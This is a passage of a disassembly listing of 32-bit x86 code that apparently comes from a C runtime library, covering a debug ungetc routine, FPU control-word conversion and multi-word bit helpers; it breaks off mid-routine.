push offset dword_43C504
push 0
push 31h
push offset aUngetc_c ; "ungetc.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_431DCB
int 3 ; Trap to Debugger
loc_431DCB: ; CODE XREF: _0:00431DAB�j _0:00431DC8�j
xor eax, eax
test eax, eax
jnz short loc_431DA7
mov ecx, [ebp+0Ch]
push ecx
call sub_422420
add esp, 4
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_431E10
add esp, 8
mov [ebp-4], eax
mov ecx, [ebp+0Ch]
push ecx
call sub_422490
add esp, 4
mov eax, [ebp-4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431E10 proc near ; CODE XREF: sub_42B330+11�p
; _0:00431DE5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_431E17: ; CODE XREF: sub_431E10+2F�j
cmp [ebp+arg_4], 0
jnz short loc_431E3B
push offset dword_43C514
push 0
push 60h
push offset aUngetc_c ; "ungetc.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_431E3B
int 3 ; Trap to Debugger
loc_431E3B: ; CODE XREF: sub_431E10+B�j
; sub_431E10+28�j
xor eax, eax
test eax, eax
jnz short loc_431E17
mov ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_431E77
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 1
test eax, eax
jnz short loc_431E7F
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jz short loc_431E77
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 2
test ecx, ecx
jz short loc_431E7F
loc_431E77: ; CODE XREF: sub_431E10+3B�j
; sub_431E10+58�j
or eax, 0FFFFFFFFh
jmp loc_431F47
; ---------------------------------------------------------------------------
loc_431E7F: ; CODE XREF: sub_431E10+48�j
; sub_431E10+65�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+8], 0
jnz short loc_431E94
mov eax, [ebp+var_4]
push eax
call sub_4313D0
add esp, 4
loc_431E94: ; CODE XREF: sub_431E10+76�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov eax, [ecx]
cmp eax, [edx+8]
jnz short loc_431EBF
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+4], 0
jz short loc_431EB2
or eax, 0FFFFFFFFh
jmp loc_431F47
; ---------------------------------------------------------------------------
loc_431EB2: ; CODE XREF: sub_431E10+98�j
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_431EBF: ; CODE XREF: sub_431E10+8F�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 40h
test eax, eax
jz short loc_431EFD
mov ecx, [ebp+var_4]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+var_4]
mov [eax], edx
mov ecx, [ebp+var_4]
mov edx, [ecx]
movsx eax, byte ptr [edx]
movsx ecx, byte ptr [ebp+arg_0]
cmp eax, ecx
jz short loc_431EFB
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
or eax, 0FFFFFFFFh
jmp short loc_431F47
; ---------------------------------------------------------------------------
loc_431EFB: ; CODE XREF: sub_431E10+D7�j
jmp short loc_431F14
; ---------------------------------------------------------------------------
loc_431EFD: ; CODE XREF: sub_431E10+BA�j
mov edx, [ebp+var_4]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
mov eax, [edx]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
loc_431F14: ; CODE XREF: sub_431E10:loc_431EFB�j
mov edx, [ebp+var_4]
mov eax, [edx+4]
add eax, 1
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and al, 0EFh
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
or al, 1
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_431F47: ; CODE XREF: sub_431E10+6A�j
; sub_431E10+9D�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_431E10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431F50 proc near ; CODE XREF: sub_42BE60+5A�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_431F50 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
fstsw word ptr [ebp-4]
mov ax, [ebp-4]
push eax
call sub_432350
add esp, 4
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
fnstsw word ptr [ebp-4]
fnclex
mov ax, [ebp-4]
push eax
call sub_432350
add esp, 4
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431FA0 proc near ; CODE XREF: sub_431FF0+10�p
var_10 = word ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
fstcw [ebp+var_10]
mov ax, [ebp+var_10]
push eax
call sub_432070
add esp, 4
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
mov edx, [ebp+arg_4]
not edx
mov eax, [ebp+var_8]
and eax, edx
or ecx, eax
mov [ebp+var_C], ecx
mov ecx, [ebp+var_C]
push ecx
call sub_4321F0
add esp, 4
mov [ebp+var_4], ax
fldcw [ebp+var_4]
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_431FA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431FF0 proc near ; CODE XREF: sub_42C3B0+D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
and eax, 0FFF7FFFFh
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_431FA0
add esp, 8
pop ebp
retn
sub_431FF0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
call sub_430A90
mov eax, [eax]
mov [ebp-4], eax
fninit
call sub_42C3B0
cmp dword ptr [ebp-4], 0
jz short loc_432061
mov ecx, [ebp-4]
mov edx, [ecx+4]
mov eax, [edx]
and eax, 10008h
test eax, eax
jz short loc_432061
mov ecx, [ebp-4]
mov edx, [ecx+4]
add edx, 1Ch
mov [ebp-8], edx
mov eax, [ebp-8]
mov dword ptr [eax+4], 0
mov ecx, [ebp-8]
mov dword ptr [ecx+8], 0FFFFh
loc_432061: ; CODE XREF: _0:0043202E�j _0:0043203F�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432070 proc near ; CODE XREF: sub_431FA0+12�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 1
test eax, eax
jz short loc_432095
mov ecx, [ebp+var_4]
or ecx, 10h
mov [ebp+var_4], ecx
loc_432095: ; CODE XREF: sub_432070+1A�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 4
test edx, edx
jz short loc_4320AD
mov eax, [ebp+var_4]
or al, 8
mov [ebp+var_4], eax
loc_4320AD: ; CODE XREF: sub_432070+33�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 8
test ecx, ecx
jz short loc_4320C6
mov edx, [ebp+var_4]
or edx, 4
mov [ebp+var_4], edx
loc_4320C6: ; CODE XREF: sub_432070+4B�j
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 10h
test eax, eax
jz short loc_4320DE
mov ecx, [ebp+var_4]
or ecx, 2
mov [ebp+var_4], ecx
loc_4320DE: ; CODE XREF: sub_432070+63�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 20h
test edx, edx
jz short loc_4320F6
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
loc_4320F6: ; CODE XREF: sub_432070+7C�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 2
test ecx, ecx
jz short loc_432112
mov edx, [ebp+var_4]
or edx, 80000h
mov [ebp+var_4], edx
loc_432112: ; CODE XREF: sub_432070+94�j
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 0C00h
mov [ebp+var_8], eax
cmp [ebp+var_8], 800h
jg short loc_432145
cmp [ebp+var_8], 800h
jz short loc_432158
cmp [ebp+var_8], 0
jz short loc_432150
cmp [ebp+var_8], 400h
jz short loc_432163
jmp short loc_432177
; ---------------------------------------------------------------------------
loc_432145: ; CODE XREF: sub_432070+B9�j
cmp [ebp+var_8], 0C00h
jz short loc_43216E
jmp short loc_432177
; ---------------------------------------------------------------------------
loc_432150: ; CODE XREF: sub_432070+C8�j
mov ecx, [ebp+var_4]
mov [ebp+var_4], ecx
jmp short loc_432177
; ---------------------------------------------------------------------------
loc_432158: ; CODE XREF: sub_432070+C2�j
mov edx, [ebp+var_4]
or dh, 2
mov [ebp+var_4], edx
jmp short loc_432177
; ---------------------------------------------------------------------------
loc_432163: ; CODE XREF: sub_432070+D1�j
mov eax, [ebp+var_4]
or ah, 1
mov [ebp+var_4], eax
jmp short loc_432177
; ---------------------------------------------------------------------------
loc_43216E: ; CODE XREF: sub_432070+DC�j
mov ecx, [ebp+var_4]
or ch, 3
mov [ebp+var_4], ecx
loc_432177: ; CODE XREF: sub_432070+D3�j
; sub_432070+DE�j ...
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 300h
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jz short loc_4321B9
cmp [ebp+var_C], 200h
jz short loc_4321AB
cmp [ebp+var_C], 300h
jz short loc_4321A3
jmp short loc_4321C5
; ---------------------------------------------------------------------------
loc_4321A3: ; CODE XREF: sub_432070+12F�j
mov eax, [ebp+var_4]
mov [ebp+var_4], eax
jmp short loc_4321C5
; ---------------------------------------------------------------------------
loc_4321AB: ; CODE XREF: sub_432070+126�j
mov ecx, [ebp+var_4]
or ecx, 10000h
mov [ebp+var_4], ecx
jmp short loc_4321C5
; ---------------------------------------------------------------------------
loc_4321B9: ; CODE XREF: sub_432070+11D�j
mov edx, [ebp+var_4]
or edx, 20000h
mov [ebp+var_4], edx
loc_4321C5: ; CODE XREF: sub_432070+131�j
; sub_432070+139�j ...
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 1000h
test eax, eax
jz short loc_4321E2
mov ecx, [ebp+var_4]
or ecx, 40000h
mov [ebp+var_4], ecx
loc_4321E2: ; CODE XREF: sub_432070+164�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_432070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4321F0 proc near ; CODE XREF: sub_431FA0+36�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
and eax, 10h
test eax, eax
jz short loc_432211
mov cx, [ebp+var_4]
or cl, 1
mov [ebp+var_4], cx
loc_432211: ; CODE XREF: sub_4321F0+14�j
mov edx, [ebp+arg_0]
and edx, 8
test edx, edx
jz short loc_432225
mov ax, [ebp+var_4]
or al, 4
mov [ebp+var_4], ax
loc_432225: ; CODE XREF: sub_4321F0+29�j
mov ecx, [ebp+arg_0]
and ecx, 4
test ecx, ecx
jz short loc_43223A
mov dx, [ebp+var_4]
or dl, 8
mov [ebp+var_4], dx
loc_43223A: ; CODE XREF: sub_4321F0+3D�j
mov eax, [ebp+arg_0]
and eax, 2
test eax, eax
jz short loc_43224F
mov cx, [ebp+var_4]
or cl, 10h
mov [ebp+var_4], cx
loc_43224F: ; CODE XREF: sub_4321F0+52�j
mov edx, [ebp+arg_0]
and edx, 1
test edx, edx
jz short loc_432263
mov ax, [ebp+var_4]
or al, 20h
mov [ebp+var_4], ax
loc_432263: ; CODE XREF: sub_4321F0+67�j
mov ecx, [ebp+arg_0]
and ecx, 80000h
test ecx, ecx
jz short loc_43227B
mov dx, [ebp+var_4]
or dl, 2
mov [ebp+var_4], dx
loc_43227B: ; CODE XREF: sub_4321F0+7E�j
mov eax, [ebp+arg_0]
and eax, 300h
mov [ebp+var_8], eax
cmp [ebp+var_8], 200h
ja short loc_4322A9
cmp [ebp+var_8], 200h
jz short loc_4322BE
cmp [ebp+var_8], 0
jz short loc_4322B4
cmp [ebp+var_8], 100h
jz short loc_4322CB
jmp short loc_4322E3
; ---------------------------------------------------------------------------
loc_4322A9: ; CODE XREF: sub_4321F0+9D�j
cmp [ebp+var_8], 300h
jz short loc_4322D8
jmp short loc_4322E3
; ---------------------------------------------------------------------------
loc_4322B4: ; CODE XREF: sub_4321F0+AC�j
mov cx, [ebp+var_4]
mov [ebp+var_4], cx
jmp short loc_4322E3
; ---------------------------------------------------------------------------
loc_4322BE: ; CODE XREF: sub_4321F0+A6�j
mov dx, [ebp+var_4]
or dh, 8
mov [ebp+var_4], dx
jmp short loc_4322E3
; ---------------------------------------------------------------------------
loc_4322CB: ; CODE XREF: sub_4321F0+B5�j
mov ax, [ebp+var_4]
or ah, 4
mov [ebp+var_4], ax
jmp short loc_4322E3
; ---------------------------------------------------------------------------
loc_4322D8: ; CODE XREF: sub_4321F0+C0�j
mov cx, [ebp+var_4]
or ch, 0Ch
mov [ebp+var_4], cx
loc_4322E3: ; CODE XREF: sub_4321F0+B7�j
; sub_4321F0+C2�j ...
mov edx, [ebp+arg_0]
and edx, 30000h
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jz short loc_432309
cmp [ebp+var_C], 10000h
jz short loc_432316
cmp [ebp+var_C], 20000h
jz short loc_432323
jmp short loc_43232B
; ---------------------------------------------------------------------------
loc_432309: ; CODE XREF: sub_4321F0+103�j
mov ax, [ebp+var_4]
or ah, 3
mov [ebp+var_4], ax
jmp short loc_43232B
; ---------------------------------------------------------------------------
loc_432316: ; CODE XREF: sub_4321F0+10C�j
mov cx, [ebp+var_4]
or ch, 2
mov [ebp+var_4], cx
jmp short loc_43232B
; ---------------------------------------------------------------------------
loc_432323: ; CODE XREF: sub_4321F0+115�j
mov dx, [ebp+var_4]
mov [ebp+var_4], dx
loc_43232B: ; CODE XREF: sub_4321F0+117�j
; sub_4321F0+124�j ...
mov eax, [ebp+arg_0]
and eax, 40000h
test eax, eax
jz short loc_432342
mov cx, [ebp+var_4]
or ch, 10h
mov [ebp+var_4], cx
loc_432342: ; CODE XREF: sub_4321F0+145�j
mov ax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4321F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432350 proc near ; CODE XREF: _0:00431F70�p _0:00431F91�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 1
test eax, eax
jz short loc_432373
mov ecx, [ebp+var_4]
or ecx, 10h
mov [ebp+var_4], ecx
loc_432373: ; CODE XREF: sub_432350+18�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 4
test edx, edx
jz short loc_43238B
mov eax, [ebp+var_4]
or al, 8
mov [ebp+var_4], eax
loc_43238B: ; CODE XREF: sub_432350+31�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 8
test ecx, ecx
jz short loc_4323A4
mov edx, [ebp+var_4]
or edx, 4
mov [ebp+var_4], edx
loc_4323A4: ; CODE XREF: sub_432350+49�j
mov eax, [ebp+arg_0]
and eax, 0FFFFh
and eax, 10h
test eax, eax
jz short loc_4323BC
mov ecx, [ebp+var_4]
or ecx, 2
mov [ebp+var_4], ecx
loc_4323BC: ; CODE XREF: sub_432350+61�j
mov edx, [ebp+arg_0]
and edx, 0FFFFh
and edx, 20h
test edx, edx
jz short loc_4323D4
mov eax, [ebp+var_4]
or al, 1
mov [ebp+var_4], eax
loc_4323D4: ; CODE XREF: sub_432350+7A�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
and ecx, 2
test ecx, ecx
jz short loc_4323F0
mov edx, [ebp+var_4]
or edx, 80000h
mov [ebp+var_4], edx
loc_4323F0: ; CODE XREF: sub_432350+92�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_432350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432400 proc near ; CODE XREF: sub_432540+70�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
and eax, 8000001Fh
jns short loc_432424
dec eax
or eax, 0FFFFFFE0h
inc eax
loc_432424: ; CODE XREF: sub_432400+1D�j
mov ecx, 1Fh
sub ecx, eax
mov [ebp+var_4], ecx
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
shl edx, cl
not edx
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
and edx, [ebp+var_8]
test edx, edx
jz short loc_43244F
xor eax, eax
jmp short loc_432480
; ---------------------------------------------------------------------------
loc_43244F: ; CODE XREF: sub_432400+49�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_432463
; ---------------------------------------------------------------------------
loc_43245A: ; CODE XREF: sub_432400:loc_432479�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_432463: ; CODE XREF: sub_432400+58�j
cmp [ebp+var_C], 3
jge short loc_43247B
mov edx, [ebp+var_C]
mov eax, [ebp+arg_0]
cmp dword ptr [eax+edx*4], 0
jz short loc_432479
xor eax, eax
jmp short loc_432480
; ---------------------------------------------------------------------------
loc_432479: ; CODE XREF: sub_432400+73�j
jmp short loc_43245A
; ---------------------------------------------------------------------------
loc_43247B: ; CODE XREF: sub_432400+67�j
mov eax, 1
loc_432480: ; CODE XREF: sub_432400+4D�j
; sub_432400+77�j
mov esp, ebp
pop ebp
retn
sub_432400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432490 proc near ; CODE XREF: sub_432540+84�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
and eax, 8000001Fh
jns short loc_4324B4
dec eax
or eax, 0FFFFFFE0h
inc eax
loc_4324B4: ; CODE XREF: sub_432490+1D�j
mov ecx, 1Fh
sub ecx, eax
mov [ebp+var_4], ecx
mov edx, 1
mov ecx, [ebp+var_4]
shl edx, cl
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
lea edx, [ecx+eax*4]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4]
push eax
call sub_4360F0
add esp, 0Ch
mov [ebp+var_10], eax
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_C], ecx
jmp short loc_432502
; ---------------------------------------------------------------------------
loc_4324F9: ; CODE XREF: sub_432490+9F�j
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_432502: ; CODE XREF: sub_432490+67�j
cmp [ebp+var_C], 0
jl short loc_432531
cmp [ebp+var_10], 0
jz short loc_432531
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
lea edx, [ecx+eax*4]
push edx
push 1
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
push edx
call sub_4360F0
add esp, 0Ch
mov [ebp+var_10], eax
jmp short loc_4324F9
; ---------------------------------------------------------------------------
loc_432531: ; CODE XREF: sub_432490+76�j
; sub_432490+7C�j
mov eax, [ebp+var_10]
mov esp, ebp
pop ebp
retn
sub_432490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432540 proc near ; CODE XREF: sub_4327D0+AB�p
; sub_4327D0+132�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_18], 0
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_14], eax
mov edx, [ebp+var_C]
and edx, 8000001Fh
jns short loc_43257E
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_43257E: ; CODE XREF: sub_432540+37�j
mov eax, 1Fh
sub eax, edx
mov [ebp+var_8], eax
mov edx, 1
mov ecx, [ebp+var_8]
shl edx, cl
mov [ebp+var_1C], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
and edx, [ebp+var_1C]
test edx, edx
jz short loc_4325CF
mov eax, [ebp+var_C]
add eax, 1
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_432400
add esp, 8
test eax, eax
jnz short loc_4325CF
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_432490
add esp, 8
mov [ebp+var_18], eax
loc_4325CF: ; CODE XREF: sub_432540+63�j
; sub_432540+7A�j
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_8]
shl edx, cl
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4]
and eax, edx
mov ecx, [ebp+var_14]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
mov eax, [ebp+var_14]
add eax, 1
mov [ebp+var_10], eax
jmp short loc_4325FF
; ---------------------------------------------------------------------------
loc_4325F6: ; CODE XREF: sub_432540+D2�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_4325FF: ; CODE XREF: sub_432540+B4�j
cmp [ebp+var_10], 3
jge short loc_432614
mov edx, [ebp+var_10]
mov eax, [ebp+arg_0]
mov dword ptr [eax+edx*4], 0
jmp short loc_4325F6
; ---------------------------------------------------------------------------
loc_432614: ; CODE XREF: sub_432540+C3�j
mov eax, [ebp+var_18]
mov esp, ebp
pop ebp
retn
sub_432540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432620 proc near ; CODE XREF: sub_4327D0+98�p
; sub_4327D0+10F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
mov [ebp+var_C], 0
jmp short loc_432644
; ---------------------------------------------------------------------------
loc_43263B: ; CODE XREF: sub_432620+46�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_432644: ; CODE XREF: sub_432620+19�j
cmp [ebp+var_C], 3
jge short loc_432668
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
jmp short loc_43263B
; ---------------------------------------------------------------------------
loc_432668: ; CODE XREF: sub_432620+28�j
mov esp, ebp
pop ebp
retn
sub_432620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432670 proc near ; CODE XREF: sub_4327D0+7C�p
; sub_4327D0+D5�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_432686
; ---------------------------------------------------------------------------
loc_43267D: ; CODE XREF: sub_432670+29�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_432686: ; CODE XREF: sub_432670+B�j
cmp [ebp+var_4], 3
jge short loc_43269B
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx*4], 0
jmp short loc_43267D
; ---------------------------------------------------------------------------
loc_43269B: ; CODE XREF: sub_432670+1A�j
mov esp, ebp
pop ebp
retn
sub_432670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4326A0 proc near ; CODE XREF: sub_4327D0+63�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_4326B6
; ---------------------------------------------------------------------------
loc_4326AD: ; CODE XREF: sub_4326A0:loc_4326CC�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_4326B6: ; CODE XREF: sub_4326A0+B�j
cmp [ebp+var_4], 3
jge short loc_4326CE
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp dword ptr [edx+ecx*4], 0
jz short loc_4326CC
xor eax, eax
jmp short loc_4326D3
; ---------------------------------------------------------------------------
loc_4326CC: ; CODE XREF: sub_4326A0+26�j
jmp short loc_4326AD
; ---------------------------------------------------------------------------
loc_4326CE: ; CODE XREF: sub_4326A0+1A�j
mov eax, 1
loc_4326D3: ; CODE XREF: sub_4326A0+2A�j
mov esp, ebp
pop ebp
retn
sub_4326A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4326E0 proc near ; CODE XREF: sub_4327D0+11F�p
; sub_4327D0+148�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_4]
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov [ebp+var_18], eax
mov eax, [ebp+arg_4]
and eax, 8000001Fh
jns short loc_432705
dec eax
or eax, 0FFFFFFE0h
inc eax
loc_432705: ; CODE XREF: sub_4326E0+1E�j
mov [ebp+var_4], eax
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
shl edx, cl
not edx
mov [ebp+var_14], edx
mov [ebp+var_8], 0
mov [ebp+var_C], 0
jmp short loc_43272E
; ---------------------------------------------------------------------------
loc_432725: ; CODE XREF: sub_4326E0+9F�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_43272E: ; CODE XREF: sub_4326E0+43�j
cmp [ebp+var_C], 3
jge short loc_432781
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4]
and eax, [ebp+var_14]
mov [ebp+var_10], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4]
mov ecx, [ebp+var_4]
shr eax, cl
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4]
or edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+eax*4], edx
mov ecx, 20h
sub ecx, [ebp+var_4]
mov edx, [ebp+var_10]
shl edx, cl
mov [ebp+var_8], edx
jmp short loc_432725
; ---------------------------------------------------------------------------
loc_432781: ; CODE XREF: sub_4326E0+52�j
mov [ebp+var_C], 2
jmp short loc_432793
; ---------------------------------------------------------------------------
loc_43278A: ; CODE XREF: sub_4326E0:loc_4327C5�j
mov eax, [ebp+var_C]
sub eax, 1
mov [ebp+var_C], eax
loc_432793: ; CODE XREF: sub_4326E0+A8�j
cmp [ebp+var_C], 0
jl short loc_4327C7
mov ecx, [ebp+var_C]
